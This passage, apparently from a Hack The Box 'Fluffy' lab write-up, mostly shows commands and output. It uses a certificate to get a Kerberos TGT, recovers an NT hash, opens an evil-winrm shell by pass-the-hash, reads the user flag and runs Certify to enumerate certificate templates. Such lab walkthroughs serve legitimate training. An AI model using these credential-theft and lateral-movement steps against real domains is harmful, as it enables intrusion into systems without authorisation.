[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools

Generated a Kerberos TGT for management_svc:

sudo ntpdate 10.10.11.69 && python3 /opt/linux/PKINITtools/gettgtpkinit.py fluffy.htb/winrm_svc -cert-pfx ./a0nK13DR.pfx -pfx-pass a3PTZIxrbeqHVU9k1LTN winrm_svc.ccache
2025-05-28 23:44:19.525707 (-0400) +25201.361630 +/- 0.009805 10.10.11.69 s1 no-leap
CLOCK: time stepped by 25201.361630
2025-05-28 23:44:19,732 minikerberos INFO     Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2025-05-28 23:44:19,744 minikerberos INFO     Requesting TGT
INFO:minikerberos:Requesting TGT
2025-05-28 16:44:30,956 minikerberos INFO     AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2025-05-28 16:44:30,956 minikerberos INFO     5b0185b873e9d6fb1faa07666855cef4d76e6b7412ef7a98a02ed5a4d17dd047
INFO:minikerberos:5b0185b873e9d6fb1faa07666855cef4d76e6b7412ef7a98a02ed5a4d17dd047
2025-05-28 16:44:30,959 minikerberos INFO     Saved TGT to file
INFO:minikerberos:Saved TGT to file

export KRB5CCNAME=/home/sake/htb-labs/Fluffy/winrm_svc.ccache

sudo ntpdate 10.10.11.69 & python3 /opt/linux/PKINITtools/getnthash.py -key 5b0185b873e9d6fb1faa07666855cef4d76e6b7412ef7a98a02ed5a4d17dd047 fluffy.htb/winrm_svc
[1] 173432
2025-05-28 23:53:04.987812 (-0400) +25201.372904 +/- 0.012582 10.10.11.69 s1 no-leap
CLOCK: time stepped by 25201.372904
[1]  + done       sudo ntpdate 10.10.11.69
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash
33bd09dc...

evil-winrm -i 10.10.11.69 -u winrm_svc -H '33bd09dc...'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> whoami
fluffy\winrm_svc

user.txt

*Evil-WinRM* PS C:\Users\winrm_svc\Desktop> cat user.txt
e0e4c0f2...

certify

*Evil-WinRM* PS C:\Users\winrm_svc>upload /home/sake/htb-labs/Fluffy/Certify.exe

*Evil-WinRM* PS C:\Users\winrm_svc>upload /home/sake/htb-labs/Fluffy/Certify.exe
                                        
Info: Uploading /home/sake/htb-labs/Fluffy/Certify.exe to C:\Users\winrm_svc\Certify.exe
                                        
Data: 232104 bytes of 232104 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\winrm_svc> .\Certify.exe find /vulnerable
 
   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.0.0
 
[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=fluffy,DC=htb'
 
[*] Listing info about the Enterprise CA 'fluffy-DC01-CA'
 
    Enterprise CA Name            : fluffy-DC01-CA
    DNS Hostname                  : DC01.fluffy.htb
    FullName                      : DC01.fluffy.htb\fluffy-DC01-CA
    Flags                         : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
    Cert SubjectName              : CN=fluffy-DC01-CA, DC=fluffy, DC=htb
    Cert Thumbprint               : 5A359CF86FF5C22818C70CC23B71A47A2F2A715E
    Cert Serial                   : 3670C4A715B864BB497F7CD72119B6F5
    Cert Start Date               : 4/17/2025 9:00:16 AM
    Cert End Date                 : 4/17/3024 9:11:16 AM
    Cert Chain                    : CN=fluffy-DC01-CA,DC=fluffy,DC=htb
    UserSpecifiedSAN              : Disabled
    CA Permissions                :
      Owner: BUILTIN\Administrators        S-1-5-32-544
 
      Access Rights                                     Principal
 
      Allow  ManageCA, ManageCertificates               BUILTIN\Administrators        S-1-5-32-544
      Allow  ManageCA, ManageCertificates               FLUFFY\Domain Admins          S-1-5-21-497550768-2797716248-2627064577-512
      Allow  Enroll                                     FLUFFY\Cert Publishers        S-1-5-21-497550768-2797716248-2627064577-517
      Allow  ManageCA, ManageCertificates               FLUFFY\Enterprise Admins      S-1-5-21-497550768-2797716248-2627064577-519
    Enrollment Agent Restrictions : None
 
[+] No Vulnerable Certificates Templates found!